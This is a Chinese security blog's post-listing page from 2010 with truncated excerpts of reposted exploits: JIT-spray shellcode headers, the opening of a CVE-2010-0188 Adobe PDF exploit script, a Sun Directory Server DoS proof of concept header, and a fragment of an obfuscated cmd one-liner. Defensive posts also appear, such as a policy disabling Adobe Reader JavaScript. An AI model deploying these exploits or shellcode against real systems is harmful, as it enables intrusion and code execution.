function is_ShadowHider(){return true}

文章列表

2010-03-21 13:11

// JITed egg-hunter stage-0 shellcode    (Permanent DEP bypass)
//      By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
// DSecRG - Digital Security Research Group [dsecrg.com]
//      TAG=3135330731353307
//                  its mean 0x07333531 twice!
//

阅读全文>>

类别：编程相关 | 评论(2) | 浏览()

CVE-2010-0188思密达

2010-03-13 15:01

Copyright villys777 All
http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html
Exploits works with Adobe js disabled.

import sys
import base64
import struct
import zlib
import StringIO

SHE

阅读全文>>

类别：0day | 评论(15) | 浏览()

围脖～

2010-03-13 01:12

http://t.sina.com.cn/imsh

类别：默认分类 | 评论(0) | 浏览()

[zz]JITed exec notepad shellcode

2010-03-10 19:39

# Title: JITed exec notepad shellcode
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Alexey Sintsov
# Published: 
# Verified: yes
# Download N/A

// JIT.swf
// 
// By Alexey Sintsov
// dookie@inbox.ru
// a.sintsov@dsec.ru
//
// DSecRG - Digital Security Research Group [dsecrg.com]
//
//  PEB-DLL-System()-notepad
//

package {
    import flash.display.MovieClip
 public class Main extends MovieClip
    {
  fun

阅读全文>>

类别：编程相关 | 评论(3) | 浏览()

[zz]JITed stage-0 shellcode

2010-03-08 16:20

# Title: JITed stage-0 shellcode
# Author: Alexey Sintsov
# Download N/A
 
// JIT_S0.AS
//
// VirtualProtect() stage-0 shellcode
//
//        how to use stack
//
//      0000: 0x11111111    -- ret addr to JIT satge0 shellcode
//      0004: 0x60616f62    -- pointer on string atom (encoded high) if ret
//      0008: 0x60616f62    -- pointer on string atom (encoded high) if ret 4
//  000c: 0x60616f62    -- pointer on string atom (encoded high) if

阅读全文>>

类别：编程相关 | 评论(7) | 浏览()

春晚刘谦魔术揭秘(高清版)

2010-02-18 19:44

类别：脚本安全 | 评论(9) | 浏览()

笑到哭出來ㄟ.lnk

2010-01-15 18:17

tw的邮箱就这么危险么？
sun_yang_ming@yahoo.com同学，你的东西丢了。

Code：

%COMsPec% /C seT L=O AS&EC

阅读全文>>

类别：闲扯 | 评论(2) | 浏览()

ESAPI4JS出来喽～

2010-01-15 18:08

转载开始：

ESAPI4JS - The new hotness!

So I have been hard at work on the ESAPI4JS code for the last couple of weeks, and have gotten it to a point where people can start to play with it. It will be in alpha for a bit yet, as not all the functionality is there, but here is a little of what you can do with it so far.

Do

阅读全文>>

类别：脚本安全 | 评论(0) | 浏览()

用组策略禁用Adobe Reader中的JavaScript

2010-01-14 20:08

新建一fvck.adm文件，写入如下内容：
------------------------------------------------------------------------------------------------------------------------------------

CLASS USER

CATEGORY "Adobe Reader"
     POLICY "Version 8.0 JavaScript Settings"
        KEYNAME "SOFTWARE\Adobe\Acrobat Reader\8.0\JSPrefs" 
        PART "Enable JavaScript"
            CHECKBOX

阅读全文>>

类别：网络安全 | 评论(4) | 浏览()

Sun Directory Server 7.0 core_get_proxyauth_dn DoS POC

2010-01-13 20:44

#!/usr/bin/env python
# sun_dsee7.py
#
# Use this code at your own risk. Never run it against a production system.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DAT

阅读全文>>

类别：0day | 评论(0) | 浏览()